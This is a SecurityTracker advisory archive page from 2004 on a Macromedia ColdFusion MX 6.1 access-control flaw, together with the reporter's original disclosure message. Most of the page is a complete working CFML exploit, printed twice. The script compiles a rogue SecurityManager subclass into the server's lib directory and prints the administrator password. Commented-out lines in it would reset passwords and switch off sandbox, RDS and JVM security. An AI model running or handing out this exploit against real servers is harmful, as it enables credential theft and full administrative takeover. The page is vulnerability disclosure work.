SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Adobe ColdFusion Vendors:   Macromedia
ColdFusion MX Lets Remote Authenticated Users Run Privileged Scripts
SecurityTracker Alert ID:  1011475
SecurityTracker URL:  http://securitytracker.com/id/1011475
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 1 2004
Impact:   Disclosure of authentication information, Disclosure of system information
Exploit Included:  Yes  
Version(s): ColdFusion MX 6.1
Description:   A vulnerability was reported in ColdFusion MX. A remote authenticated user with the ability to create ColdFusion templates can obtain the administrative password.

Eric Lackey reported that a remote authenticated user with privileges to create templates that contain CreateObject and cfobject tags can create a template to access the administrative password. The template can write a Java class to the lib directory, compile the code, and then perform administrative functions.

A demonstration exploit script is provided:

<cfscript>

objFileWriter = CreateObject("java","java.io.FileWriter");

objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");

objJavaC = CreateObject("java","sun.tools.javac.Main");

objString = CreateObject("java","java.lang.String");

objFile = CreateObject("java","java.io.File");

if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }

strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";

strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";

strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";

strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";

fileWriter = objFileWriter.init("#strJavaSource#",false);

fileWriter.write("import coldfusion.security.SecurityManager;");

fileWriter.write("import java.io.File;");

fileWriter.write("public class SecurityExploit extends SecurityManager {");

fileWriter.write("public SecurityExploit(File arg0, File arg1) {");

fileWriter.write("super(arg0, arg1); }");

fileWriter.write("public boolean isAdminSecurityEnabled(){");

fileWriter.write("return false;}}");

fileWriter.flush();

fileWriter.close();

str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");

strArr = str.split(",");

byteArray = objByteArray.init();

compileObj =objJavaC.init(byteArray,str);

compileObj.compile(strArr);

obj = CreateObject("java","SecurityExploit");

file1 = objFile.init("#strNeoSecFile#");

file2 = objFile.init("#strPasswdFile#");

obj.init(file1,file2);

obj.load();

</cfscript>

<cfscript>

// Get Administrator Password

strAdminPw = obj.getAdminPassword();

// Set Administrator Password

//obj.setAdminPassword("test123");


// Turn off Sandbox Security

//obj.setSandboxSecurityEnabled(false);


// Turn off Administrator Login

//obj.setAdminSecurityEnabled(false);


// Turn off RDS Login

//obj.setRdsSecurityEnabled(false);


// Set RDS Password

//obj.setRdsPassword("test123");


// Turn off JVM Security

//obj.setJvmSecurityEnabled(false);

</cfscript>

<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>

Impact:   A remote authenticated user with template creation privileges may be able to run privileged scripts to perform administrative functions, such as disclosing the administrative password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.macromedia.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  CFMX vulnerability


Software: Macromedia ColdFusion MX 6.1

Description:
There is a vulnerability in the ColdFusion MX 6.1 product. To exploit
this, a user needs access to create a cold fusion template on a
ColdFusion server with CreateObject or cfobject tags enabled.  The
code given below writes a java class to the ColdFusion lib directory
which allows writing by default.  This code compiles the java file,
but there are other ways to write the class file if the compiler class
is not available.  Once the class is written, it can be accessed by CF
and all methods exposed.  A user can do a variety of things like
getting the administrator password.  Code and examples are given
below.

Platform Tested: Windows/Linux

Version Tested: ColdFusion MX 6.1

<cfscript>

objFileWriter = CreateObject("java","java.io.FileWriter");

objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");

objJavaC = CreateObject("java","sun.tools.javac.Main");

objString = CreateObject("java","java.lang.String");

objFile = CreateObject("java","java.io.File");

if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }

strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java"; 

strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";

strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";

strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";

fileWriter = objFileWriter.init("#strJavaSource#",false);

fileWriter.write("import coldfusion.security.SecurityManager;");

fileWriter.write("import java.io.File;");

fileWriter.write("public class SecurityExploit extends SecurityManager {");

fileWriter.write("public SecurityExploit(File arg0, File arg1) {");

fileWriter.write("super(arg0, arg1); }");

fileWriter.write("public boolean isAdminSecurityEnabled(){");

fileWriter.write("return false;}}");

fileWriter.flush();

fileWriter.close();

str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");

strArr = str.split(",");

byteArray = objByteArray.init();

compileObj =objJavaC.init(byteArray,str);

compileObj.compile(strArr);

obj = CreateObject("java","SecurityExploit");

file1 = objFile.init("#strNeoSecFile#");

file2 = objFile.init("#strPasswdFile#");

obj.init(file1,file2);

obj.load();

</cfscript>

<cfscript>

// Get Administrator Password 

strAdminPw = obj.getAdminPassword();

// Set Administrator Password

//obj.setAdminPassword("test123");


// Turn off Sandbox Security

//obj.setSandboxSecurityEnabled(false);


// Turn off Administrator Login

//obj.setAdminSecurityEnabled(false);


// Turn off RDS Login

//obj.setRdsSecurityEnabled(false);


// Set RDS Password

//obj.setRdsPassword("test123");


// Turn off JVM Security

//obj.setJvmSecurityEnabled(false);

</cfscript>

<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC